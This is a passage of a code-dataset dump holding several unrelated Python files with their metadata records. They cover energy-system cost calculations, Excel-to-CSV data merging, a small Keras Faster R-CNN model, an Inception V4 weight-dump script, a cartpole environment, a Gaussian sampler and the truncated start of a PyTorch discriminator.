Opex_a_PV = calc_opex_PV(pv_annual_production_kWh, pv_installed_area)\n PV_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"PV\")\n technology_code = list(set(PV_cost_data['code']))\n PV_cost_data[PV_cost_data['code'] == technology_code[0]]\n Inv_IR = (PV_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = PV_cost_data.iloc[0]['LT_yr']\n Capex_total_PV = (Capex_a_PV * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_PV'] = Capex_total_PV\n data_costs['Opex_total_PV'] = Opex_a_PV + Opex_fixed_PV\n data_costs['Opex_fixed_PV'] = Opex_fixed_PV\n data_costs['Capex_a_PV'] = Capex_a_PV\n\n # Disconnected Buildings\n Capex_total_disconnected = 0\n Opex_total_disconnected = 0\n Capex_a_total_disconnected = 0\n\n for (index, building_name) in zip(DCN_barcode, building_names):\n if index is '0':\n df = pd.read_csv(locator.get_optimization_disconnected_folder_building_result_cooling(building_name,\n configuration='AHU_ARU_SCU'))\n dfBest = df[df[\"Best configuration\"] == 1]\n\n if dfBest['VCC to AHU_ARU_SCU Share'].iloc[0] == 1: #FIXME: Check for other options\n Inv_IR = (VCC_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = VCC_cost_data.iloc[0]['LT_yr']\n\n if dfBest['single effect ACH to AHU_ARU_SCU Share (FP)'].iloc[0] == 1:\n Inv_IR = (Absorption_chiller_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = Absorption_chiller_cost_data.iloc[0]['LT_yr']\n\n Opex_total_disconnected += dfBest[\"Operation Costs [CHF]\"].iloc[0]\n Capex_a_total_disconnected += dfBest[\"Annualized Investment Costs [CHF]\"].iloc[0]\n Capex_total_disconnected += (dfBest[\"Annualized Investment Costs [CHF]\"].iloc[0] * ((1 + Inv_IR) ** Inv_LT - 
1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_disconnected_Mio'] = Capex_total_disconnected / 1000000\n data_costs['Opex_total_disconnected_Mio'] = Opex_total_disconnected / 1000000\n data_costs['Capex_a_disconnected_Mio'] = Capex_a_total_disconnected / 1000000\n\n data_costs['Capex_a_disconnected'] = Capex_a_total_disconnected\n data_costs['Opex_total_disconnected'] = Opex_total_disconnected\n\n data_costs['costs_Mio'] = data_raw['population']['costs_Mio'][individual]\n data_costs['emissions_kiloton'] = data_raw['population']['emissions_kiloton'][individual]\n data_costs['prim_energy_TJ'] = data_raw['population']['prim_energy_TJ'][individual]\n\n # Network costs\n network_costs_a = network_features.pipesCosts_DCN * DCN_barcode.count(\"1\") / len(DCN_barcode)\n data_costs['Network_costs'] = network_costs_a\n Inv_IR = 0.05\n Inv_LT = 20\n network_costs_total = (network_costs_a * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Network_costs_Total'] = network_costs_total\n # Substation costs\n substation_costs_a = 0\n substation_costs_total = 0\n for (index, building_name) in zip(DCN_barcode, building_names):\n if index == \"1\":\n if df_current_individual['Data Centre'][0] == 1:\n df = pd.read_csv(locator.get_optimization_substations_results_file(building_name),\n usecols=[\"Q_space_cooling_and_refrigeration_W\"])\n else:\n df = pd.read_csv(locator.get_optimization_substations_results_file(building_name),\n usecols=[\"Q_space_cooling_data_center_and_refrigeration_W\"])\n\n subsArray = np.array(df)\n\n Q_max_W = np.amax(subsArray)\n HEX_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"HEX\")\n HEX_cost_data = HEX_cost_data[HEX_cost_data['code'] == 'HEX1']\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Q_max_W < HEX_cost_data.iloc[0]['cap_min']:\n Q_max_W = HEX_cost_data.iloc[0]['cap_min']\n HEX_cost_data = HEX_cost_data[\n (HEX_cost_data['cap_min'] <= Q_max_W) & (HEX_cost_data['cap_max'] > Q_max_W)]\n\n Inv_a = HEX_cost_data.iloc[0]['a']\n Inv_b = HEX_cost_data.iloc[0]['b']\n Inv_c = HEX_cost_data.iloc[0]['c']\n Inv_d = HEX_cost_data.iloc[0]['d']\n Inv_e = HEX_cost_data.iloc[0]['e']\n Inv_IR = (HEX_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = HEX_cost_data.iloc[0]['LT_yr']\n Inv_OM = HEX_cost_data.iloc[0]['O&M_%'] / 100\n\n InvC = Inv_a + Inv_b * (Q_max_W) ** Inv_c + (Inv_d + Inv_e * Q_max_W) * log(Q_max_W)\n\n Capex_a = InvC * (Inv_IR) * (1 + Inv_IR) ** Inv_LT / ((1 + Inv_IR) ** Inv_LT - 1)\n Opex_fixed = Capex_a * Inv_OM\n substation_costs_total += InvC\n substation_costs_a += Capex_a + Opex_fixed\n\n data_costs['Substation_costs'] = substation_costs_a\n data_costs['Substation_costs_Total'] = substation_costs_total\n # Electricity Details/Renewable Share\n total_electricity_demand_decentralized_W = np.zeros(8760)\n\n DCN_barcode = \"\"\n for name in building_names: # identifying the DCN code\n DCN_barcode += str(int(df_current_individual[name + ' DCN'].values[0]))\n for i, name in zip(DCN_barcode,\n building_names): # adding the electricity demand from the decentralized buildings\n if i is '0':\n building_demand = pd.read_csv(locator.get_demand_results_folder() + '//' + name + \".csv\",\n usecols=['E_sys_kWh'])\n\n total_electricity_demand_decentralized_W += building_demand['E_sys_kWh'] * 1000\n\n lca = lca_calculations(locator, config)\n\n data_electricity_processed = 
electricity_import_and_exports(generation_number, individual_number, locator, config)\n\n\n data_costs['Network_electricity_demand_GW'] = (data_electricity['E_total_req_W'].sum()) / 1000000000 # GW\n data_costs['Decentralized_electricity_demand_GW'] = (data_electricity_processed['E_decentralized_appliances_W'].sum()) / 1000000000 # GW\n data_costs['Total_electricity_demand_GW'] = (data_electricity_processed['E_total_req_W'].sum()) / 1000000000 # GW\n data_costs['Electricity_for_hotwater_GW'] = (data_electricity_processed['E_for_hot_water_demand_W'].sum()) / 1000000000 # GW\n data_costs['Electricity_for_appliances_GW'] = (data_electricity_processed['E_appliances_total_W'].sum()) / 1000000000 # GW\n\n renewable_share_electricity = (data_electricity_processed['E_PV_to_directload_W'].sum() +\n data_electricity_processed['E_PV_to_grid_W'].sum()) * 100 / \\\n (data_costs['Total_electricity_demand_GW'] * 1000000000)\n data_costs['renewable_share_electricity'] = renewable_share_electricity\n\n data_costs['Electricity_Costs_Mio'] = ((data_electricity_processed['E_from_grid_W'].sum() +\n data_electricity_processed[\n 'E_total_to_grid_W_negative'].sum()) * lca.ELEC_PRICE) / 1000000\n\n data_costs['Capex_a_total_Mio'] = (Capex_a_ACH * number_of_ACH_chillers + Capex_a_VCC * number_of_VCC_chillers + \\\n Capex_a_VCC_backup * number_of_VCC_backup_chillers + Capex_a_CT * number_of_CT + Capex_a_storage_tank + \\\n Capex_a_total_pumps + Capex_a_CCGT + Capex_a_PV + Capex_a_total_disconnected + substation_costs_a + network_costs_a) / 1000000\n\n data_costs['Capex_a_ACH'] = Capex_a_ACH * number_of_ACH_chillers\n data_costs['Capex_a_VCC'] = Capex_a_VCC * number_of_VCC_chillers\n data_costs['Capex_a_VCC_backup'] = Capex_a_VCC_backup * number_of_VCC_backup_chillers\n data_costs['Capex_a_CT'] = Capex_a_CT * number_of_CT\n data_costs['Capex_a_storage_tank'] = Capex_a_storage_tank\n data_costs['Capex_a_total_pumps'] = Capex_a_total_pumps\n data_costs['Capex_a_CCGT'] = Capex_a_CCGT\n data_costs['Capex_a_PV'] = Capex_a_PV\n\n data_costs['Capex_total_Mio'] = (data_costs['Capex_total_ACH'] + data_costs['Capex_total_VCC'] + data_costs['Capex_total_VCC_backup'] + \\\n data_costs['Capex_total_storage_tank'] + data_costs['Capex_total_CT'] + data_costs['Capex_total_CCGT'] + \\\n data_costs['Capex_total_pumps'] + data_costs['Capex_total_PV'] + Capex_total_disconnected + substation_costs_total + network_costs_total) / 1000000\n\n data_costs['Opex_total_Mio'] = (((data_costs['Opex_total_ACH'] + data_costs['Opex_total_VCC'] + data_costs['Opex_total_VCC_backup'] + \\\n data_costs['Opex_total_storage_tank'] + data_costs['Opex_total_CT'] + data_costs['Opex_total_CCGT'] + \\\n data_costs['Opex_total_pumps'] + Opex_total_disconnected)) + data_costs['Opex_total_PV'] + \\\n data_costs['Total_electricity_demand_GW'] * 1000000000 * lca.ELEC_PRICE) / 1000000\n\n data_costs['TAC_Mio'] = data_costs['Capex_a_total_Mio'] + data_costs['Opex_total_Mio']\n\n # temporary fix for bug in emissions calculation, change it after executive course\n data_costs['total_emissions_kiloton'] = data_costs['emissions_kiloton'] - abs(2 * data_emissions['CO2_PV_disconnected'] / 1000000)\n data_costs['total_prim_energy_TJ'] = data_costs['prim_energy_TJ'] - abs(2 * data_emissions['Eprim_PV_disconnected'] / 1000000)\n\n\n return data_costs\n\ndef main(config):\n locator = cea.inputlocator.InputLocator(config.scenario)\n\n print(\"Running multicriteria with scenario = %s\" % config.scenario)\n print(\"Running multicriteria for generation = %s\" % 
config.multi_criteria.generations)\n\n multi_criteria_main(locator, config)\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())","sub_path":"cea/analysis/multicriteria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":34218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"648534426","text":"#!/usr/bin/env python\n'''\nPython program to extract faces data and append to a single large csv file (>600MB)\n\nFile Issues: manually fix these so that the header row is 9\n - T034-005.xlsx: header starts on row 8\n - T009-006.xlsx: header starts on row 10\n'''\n\n\nimport os\nimport pandas as pd\n\n# Get list of files in directory\nlst = sorted(os.listdir(\"Faces\"))\n\n# Path to Files\npath = \"Faces/\"\n\n# Variable Start/Stop\nx1 = 0\n\n# First File\noutput = pd.read_excel(path + lst[x1], header=8, parse_cols=\"A:J\")\n\n# Create ID\noutput[\"ID\"] = lst[x1]\n\n# Loop for all of the files in\nfor x in lst[x1 + 1:]:\n tmp = pd.read_excel(path + x, header=8, parse_cols=\"A:J\")\n tmp[\"ID\"] = x\n output = output.append(tmp)\n\n# Create some ID columns\noutput[\"ID\"] = output[\"ID\"].str[:8]\n\n# Export data\noutput.to_csv(\"data-faces.csv\", index=False)\n","sub_path":"Files/extract_faces.py","file_name":"extract_faces.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"612845398","text":"from keras import Model\nfrom keras.layers import Flatten, Dense, Conv2D, MaxPooling2D, Input\nfrom keras.layers import TimeDistributed\n\nfrom keras_frcnn.RoiPoolingConv import RoiPoolingConv\n\n\ndef get_weight_path():\n return None\n\ndef get_img_output_length(width, height):\n def get_output_length(input_length):\n return input_length/16\n\n return get_output_length(width), get_output_length(height)\n\n\ndef nn_base(input_tensor, trainable=True):\n # block 1\n x = Conv2D(8, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block1_conv1')(input_tensor)\n x = Conv2D(8, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block1_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)\n\n # block 2\n x = Conv2D(16, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block2_conv1')(x)\n x = Conv2D(16, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block2_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)\n\n # block 3\n x = Conv2D(32, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block3_conv1')(x)\n x = Conv2D(32, (3, 3), activation='relu', padding='same', kernel_initializer='he_uniform', name='block3_conv2')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)\n\n # Block 4\n x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)\n x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)\n x = Conv2D(64, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)\n x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)\n\n return x\n\n\ndef rpn(base_layers, num_anchors):\n x = Conv2D(32, (3, 3), padding='same', activation='relu', kernel_initializer='he_uniform', name='rpn_conv1')(base_layers)\n\n x_class = Conv2D(num_anchors, (1, 1), activation='sigmoid', kernel_initializer='uniform', name='rpn_out_class')(x)\n x_regr = Conv2D(num_anchors * 4, 
(1, 1), activation='linear', kernel_initializer='uniform', name='rpn_out_regr')(x)\n\n return [x_class, x_regr]\n\n\ndef classifier(base_layers, input_rois, num_rois, nb_classes=21, trainable=True):\n pooling_regions = 7\n out_roi_pool = RoiPoolingConv(pooling_regions, num_rois)([base_layers, input_rois])\n\n out = TimeDistributed(Flatten(name='flatten'), name='td1')(out_roi_pool)\n out = TimeDistributed(Dense(128, activation='relu', name='fc1'), name='td2')(out)\n out = TimeDistributed(Dense(128, activation='relu', name='fc2'), name='td3')(out)\n\n out_class = TimeDistributed(Dense(nb_classes, activation='softmax', kernel_initializer='zero'), name='dense_class_{}'.format(nb_classes))(out)\n # note: no regression target for bg class\n out_regr = TimeDistributed(Dense(4 * (nb_classes-1), activation='linear', kernel_initializer='zero'), name='dense_regress_{}'.format(nb_classes))(out)\n\n return [out_class, out_regr]\n\n\nif __name__ == '__main__':\n input_shape_img = (None, None, 3)\n\n # input placeholder 정의\n img_input = Input(shape=input_shape_img)\n roi_input = Input(shape=(None, 4))\n\n # base network(feature extractor) 정의 (resnet, VGG, Inception, Inception Resnet V2, etc)\n shared_layers = nn_base(img_input, trainable=True)\n\n # define the RPN, built on the base layers\n # RPN 정의\n num_anchors = 9\n rpn = rpn(shared_layers, num_anchors)\n\n # detection network 정의\n classifier = classifier(shared_layers, roi_input, 300, nb_classes=2, trainable=True)\n\n model_rpn = Model(img_input, rpn[:2])\n model_classifier = Model([img_input, roi_input], classifier)\n\n # this is a model that holds both the RPN and the classifier, used to load/save weights for the models\n model_all: Model = Model([img_input, roi_input], rpn[:2] + classifier)\n print(model_all.summary(positions=[.3, .6, .8, 1.]))\n","sub_path":"keras_frcnn/fannet.py","file_name":"fannet.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"229379458","text":"# python3\n\n# TensorBoard\n# python3 ~/.local/lib/python3.5/site-packages/tensorflow/tensorboard/tensorboard.py --logdir=logs --port=6007\n\nimport os\nimport sys\nimport h5py\nimport math\nimport urllib.request\nimport numpy as np\nimport tensorflow as tf\n\nsys.path.append('models/slim')\nfrom datasets import dataset_utils\nfrom datasets import imagenet\nfrom nets import inception\nfrom preprocessing import inception_preprocessing\n\nslim = tf.contrib.slim\n\nimage_size = inception.inception_v3.default_image_size\n\nurl = 'http://download.tensorflow.org/models/inception_v4_2016_09_09.tar.gz'\ncheckpoints_dir = '/tmp/checkpoints'\n\ndef make_padding(padding_name, conv_shape):\n padding_name = padding_name.decode(\"utf-8\")\n if padding_name == \"VALID\":\n return [0, 0]\n elif padding_name == \"SAME\":\n #return [math.ceil(int(conv_shape[0])/2), math.ceil(int(conv_shape[1])/2)]\n return [math.floor(int(conv_shape[0])/2), math.floor(int(conv_shape[1])/2)]\n else:\n sys.exit('Invalid padding name '+padding_name)\n\n\n# if not tf.gfile.Exists(checkpoints_dir+'inception_v4.ckpt'):\n# tf.gfile.MakeDirs(checkpoints_dir)\n# dataset_utils.download_and_uncompress_tarball(url, checkpoints_dir)\n\nwith tf.Graph().as_default():\n\n\n # Create model architecture\n\n inputs = np.zeros((1,299,299,3), dtype=np.float32)\n inputs[0][0][0][0] = 1\n inputs = tf.pack(inputs)\n\n with slim.arg_scope(inception.inception_v4_arg_scope()):\n logits, _ = inception.inception_v4(inputs, num_classes=1001, 
is_training=False)\n\n with tf.Session() as sess:\n\n # Initialize model\n\n init_fn = slim.assign_from_checkpoint_fn(\n os.path.join(checkpoints_dir, 'inception_v4.ckpt'),\n slim.get_model_variables('InceptionV4')) \n\n init_fn(sess)\n\n # Display model variables\n\n for v in slim.get_model_variables():\n print('name = {}, shape = {}'.format(v.name, v.get_shape()))\n\n # Create graph\n\n #os.system('rm -rf logs')\n #os.makedirs(\"logs\")\n\n tf.scalar_summary('logs', logits[0][0])\n summary_op = tf.merge_all_summaries()\n summary_writer = tf.train.SummaryWriter(\"logs\", sess.graph)\n\n out = sess.run(summary_op)\n summary_writer.add_summary(out, 0)\n\n # Dump \n \n\n \n\n def dump_conv2d(name='Conv2d_1a_3x3'):\n \n conv_operation = sess.graph.get_operation_by_name('InceptionV4/InceptionV4/'+name+'/Conv2D')\n\n weights_tensor = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/weights:0')\n weights = weights_tensor.eval()\n\n padding = make_padding(conv_operation.get_attr('padding'), weights_tensor.get_shape())\n strides = conv_operation.get_attr('strides')\n\n conv_out = sess.graph.get_operation_by_name('InceptionV4/InceptionV4/'+name+'/Conv2D').outputs[0].eval()\n \n beta = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/beta:0').eval()\n #gamma = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/gamma:0').eval()\n mean = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/moving_mean:0').eval()\n var = sess.graph.get_tensor_by_name('InceptionV4/'+name+'/BatchNorm/moving_variance:0').eval()\n \n relu_out = sess.graph.get_operation_by_name('InceptionV4/InceptionV4/'+name+'/Relu').outputs[0].eval()\n\n os.system('mkdir -p dump/InceptionV4/'+name)\n h5f = h5py.File('dump/InceptionV4/'+name+'.h5', 'w')\n # conv\n h5f.create_dataset(\"weights\", data=weights)\n h5f.create_dataset(\"strides\", data=strides)\n h5f.create_dataset(\"padding\", data=padding)\n h5f.create_dataset(\"conv_out\", data=conv_out)\n # batch norm\n h5f.create_dataset(\"beta\", data=beta)\n #h5f.create_dataset(\"gamma\", data=gamma)\n h5f.create_dataset(\"mean\", data=mean)\n h5f.create_dataset(\"var\", data=var)\n h5f.create_dataset(\"relu_out\", data=relu_out)\n h5f.close()\n\n def dump_mixed_4a_7a(name='Mixed_4a'):\n dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_0/Conv2d_1a_3x3')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_1x7')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0c_7x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_1a_3x3')\n\n def dump_mixed_5(name='Mixed_5b'):\n dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_3x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0b_3x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0c_3x3')\n dump_conv2d(name=name+'/Branch_3/Conv2d_0b_1x1')\n\n def dump_mixed_6(name='Mixed_6b'):\n dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_1x7')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0c_7x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0b_7x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0c_1x7')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0d_7x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0e_1x7')\n dump_conv2d(name=name+'/Branch_3/Conv2d_0b_1x1')\n\n def dump_mixed_7(name='Mixed_7b'):\n 
dump_conv2d(name=name+'/Branch_0/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0b_1x3')\n dump_conv2d(name=name+'/Branch_1/Conv2d_0c_3x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0a_1x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0b_3x1')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0c_1x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0d_1x3')\n dump_conv2d(name=name+'/Branch_2/Conv2d_0e_3x1')\n dump_conv2d(name=name+'/Branch_3/Conv2d_0b_1x1')\n\n dump_conv2d(name='Conv2d_1a_3x3')\n dump_conv2d(name='Conv2d_2a_3x3')\n dump_conv2d(name='Conv2d_2b_3x3')\n\n dump_conv2d(name='Mixed_3a/Branch_1/Conv2d_0a_3x3')\n dump_mixed_4a_7a(name='Mixed_4a')\n dump_conv2d(name='Mixed_5a/Branch_0/Conv2d_1a_3x3')\n\n dump_mixed_5(name='Mixed_5b')\n dump_mixed_5(name='Mixed_5c')\n dump_mixed_5(name='Mixed_5d')\n dump_mixed_5(name='Mixed_5e')\n\n dump_conv2d(name='Mixed_6a/Branch_0/Conv2d_1a_3x3')\n dump_conv2d(name='Mixed_6a/Branch_1/Conv2d_0a_1x1')\n dump_conv2d(name='Mixed_6a/Branch_1/Conv2d_0b_3x3')\n dump_conv2d(name='Mixed_6a/Branch_1/Conv2d_1a_3x3')\n\n dump_mixed_6(name='Mixed_6b')\n dump_mixed_6(name='Mixed_6c')\n dump_mixed_6(name='Mixed_6d')\n dump_mixed_6(name='Mixed_6e')\n dump_mixed_6(name='Mixed_6f')\n dump_mixed_6(name='Mixed_6g')\n dump_mixed_6(name='Mixed_6h')\n\n dump_mixed_4a_7a(name='Mixed_7a')\n\n dump_mixed_7(name='Mixed_7b')\n dump_mixed_7(name='Mixed_7c')\n dump_mixed_7(name='Mixed_7d')\n\n\n # AuxLogits/Conv2d_1b_1x1\n # AuxLogits/Conv2d_2a\n\n # name = InceptionV4/AuxLogits/Aux_logits/weights:0, shape = (768, 1001)\n # name = InceptionV4/AuxLogits/Aux_logits/biases:0, shape = (1001,)\n # name = InceptionV4/Logits/Logits/weights:0, shape = (1536, 1001)\n # name = InceptionV4/Logits/Logits/biases:0, shape = (1001,)\n\n\n # operations = sess.graph.get_operations()\n # print(len(operations))\n \n #sess.graph.get_tensor_by_name(\n\n\n # for v in sess.graph.get_operations():\n # print(v.name)\n\n\n\n # if not os.path.exists(\"dump\"):\n # os.makedirs(\"dump\")\n\n # for v in slim.get_model_variables():\n # print('name = {}, shape = {}'.format(v.name, v.get_shape()))\n\n # gname = 'InceptionV3/Conv2d_1a_3x3'\n # weights = sess.graph.get_operation_by_name(gname + '/weights:0')\n\n\n # weights = sess.graph.get_tensor_by_name(gname + '/conv2d_params:0').eval()\n # padding = make_padding(conv.get_attr(\"padding\"), weights.shape)\n # strides = conv.get_attr(\"strides\")\n\n # beta = sess.graph.get_tensor_by_name(gname + '/batchnorm/beta:0').eval()\n # gamma = sess.graph.get_tensor_by_name(gname + '/batchnorm/gamma:0').eval()\n # mean = sess.graph.get_tensor_by_name(gname + '/batchnorm/moving_mean:0').eval()\n # var = sess.graph.get_tensor_by_name(gname + '/batchnorm/moving_variance:0').eval()\n\n\n #conv = sess.graph.get_operation_by_name('InceptionV3/Conv2d_1a_3x3')\n\n #weights = sess.graph.get_tensor_by_name('InceptionV3/Conv2d_1a_3x3')\n #conv = slim.get_model_variables()\n\n # saver = tf.train.Saver(tf.global_variables())\n\n # with tf.Session() as sess:\n # m = saver.restore(sess, os.path.join(checkpoints_dir, 'inception_v3.ckpt'))\n\n # url = 'https://upload.wikimedia.org/wikipedia/commons/7/70/EnglishCockerSpaniel_simon.jpg'\n # image_string = urllib.request.urlopen(url).read()\n # image = tf.image.decode_jpeg(image_string, channels=3)\n # processed_image = inception_preprocessing.preprocess_image(image, image_size, image_size, is_training=False)\n # processed_images = tf.expand_dims(processed_image, 0)\n\n# with 
slim.arg_scope(inception.inception_v3_arg_scope()):\n# logits, _ = inception.inception_v3(processed_images, num_classes=1001, is_training=False)\n \n# probabilities = tf.nn.softmax(logits)\n\n# for v in slim.get_model_variables():\n# print('name = {}, shape = {}'.format(v.name, v.get_shape()))\n\n # init_fn = slim.assign_from_checkpoint_fn(\n # os.path.join(checkpoints_dir, 'inception_v3.ckpt'),\n # slim.get_model_variables('InceptionV3'))\n\n# with tf.Session() as sess:\n# init_fn(sess)\n# np_image, probabilities = sess.run([image, probabilities])\n# probabilities = probabilities[0, 0:]\n# sorted_inds = [i[0] for i in sorted(enumerate(-probabilities), key=lambda x:x[1])]\n\n # print('image', image)\n # print()\n # print('np_image', np_image)\n # print()\n # print('proba', probabilities)\n # print()\n # # print('sorted_inds', sorted_inds)\n\n # names = imagenet.create_readable_names_for_imagenet_labels()\n # for i in range(5):\n # index = sorted_inds[i]\n # print('Probability %0.2f%% => [%s]' % (probabilities[index], names[index]))","sub_path":"inceptionv4_dump_filters.py","file_name":"inceptionv4_dump_filters.py","file_ext":"py","file_size_in_byte":9970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"348949459","text":"import gym\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport autograd.numpy as np\n\n\ndef normalize(x):\n return ((x + np.pi) % (2. * np.pi)) - np.pi\n\n\nclass Cartpole(gym.Env):\n\n def __init__(self):\n self.dm_state = 2\n self.dm_act = 1\n self.dm_obs = 2\n\n self._dt = 0.1\n\n self._sigma = 1.e-64 * np.eye(self.dm_state)\n\n self._state_max = np.array([np.pi, np.inf])\n\n self._obs_max = np.array([np.pi, np.inf])\n self.observation_space = spaces.Box(low=-self._obs_max,\n high=self._obs_max)\n\n self._act_max = 50.\n self.action_space = spaces.Box(low=-self._act_max,\n high=self._act_max, shape=(1,))\n\n self.state = None\n self.np_random = None\n\n self.seed()\n\n @property\n def xlim(self):\n return self._state_max\n\n @property\n def ulim(self):\n return self._act_max\n\n @property\n def dt(self):\n return self._dt\n\n def dynamics(self, x, u):\n g, m, l, M = 9.81, 2.0, 0.5, 8.0\n a = 1.0 / (m + M)\n\n dx = np.array([x[1],\n (g * np.sin(x[0]) - 0.5 * a * m * l * x[1]**2 * np.sin(2 * x[0]) -\n a * np.cos(x[0]) * u) / (4.0 * l / 3.0 - a * m * l * np.cos(x[0])**2)])\n\n return x + self._dt * dx\n\n def action(self, u):\n if u == 0:\n return -50.0\n elif u == 1:\n return 50.0\n else:\n return 0.0\n\n def observe(self, x):\n return x\n\n def noise(self, x=None, u=None):\n return self._sigma\n\n def reward(self, x):\n if np.fabs(x[0]) <= 0.5 * np.pi:\n return np.array([0.0])\n else:\n return np.array([-1.0])\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def step(self, u):\n _u = self.action(u)\n\n done = False\n if np.fabs(self.state[0]) > 0.5 * np.pi:\n done = True\n\n rwrd = self.reward(self.state)\n\n self.state = self.dynamics(self.state, _u)\n self.state[0] = normalize(self.state[0])\n\n return self.observe(self.state), rwrd, done, {}\n\n def reset(self):\n self.state = np.random.uniform(-0.1, 0.1, size=2)\n return self.observe(self.state)\n","sub_path":"rl/envs/control/lagoudakis/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"464450432","text":"import numpy as np\nimport numpy.random as rand\n\nclass 
SimpleTwoDimGaussian:\n \"\"\"Sampling simple 2-dim correlated Gaussian distribution\n\n Args:\n data_size (int): Size of data.\n corrcoef (int) : Correlation coefficient\n\n Attributes:\n dim (int) : dimension of data, 2.\n var (float) : Variance of each gaussian.\n corrcoef (float) : Correlations\n\n \"\"\"\n\n def __init__(self, data_size=10, corrcoef=0.6, var=1.0):\n self.dim = 2\n self.var = var \n self.data_size = data_size\n self.corrcoef = corrcoef\n\n def generate(self):\n \"\"\"Generate sample data whose number is data_size\n\n Args:\n\n Return:\n data (np.ndarray) : Sample data,shape (data_size, 2), dtype is float32\n \"\"\"\n stdev = np.sqrt(self.var)\n\n x = stdev * rand.randn(self.data_size).astype(np.float32) \n y = stdev * rand.randn(self.data_size).astype(np.float32)\n z = self.corrcoef * x + ( 1 - self.corrcoef**2)**0.5 * y\n z = z.astype(np.float32)\n data = np.stack([x,z],1)\n return data\n\n def energy(self, z=None, analytical=False):\n \"\"\"Return energy for variational free energy loss.\n\n Args:\n \n Args:\n z (torch.tensor) : Data, shape (batch size, 2).\n analytical (bool) : Return value analytically caluculated. \n In this mode, data input is not required.\n \"\"\"\n if(not analytical):\n x = z[:,0]\n y = z[:,1]\n numerator = 0.5 * (x ** 2 + y ** 2 - 2.0* self.corrcoef * x * y)\n denominator = (1.0 - self.corrcoef ** 2.0) * self.var\n total_energy = numerator / denominator\n else:\n total_energy = 1.0\n\n return total_energy\n","sub_path":"neuct/neuct/distributions/simple_two_dim_gaussian.py","file_name":"simple_two_dim_gaussian.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"274781441","text":"\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nfrom torch.autograd import grad,Variable\r\nfrom torch.utils.data import DataLoader\r\n\r\nimport numpy as np\r\n\r\nuse_cuda = torch.cuda.is_available()\r\ndevice = torch.device('cuda' if use_cuda else 'cpu')\r\nclass Discriminator(nn.Module):\r\n\r\n def __init__(self, 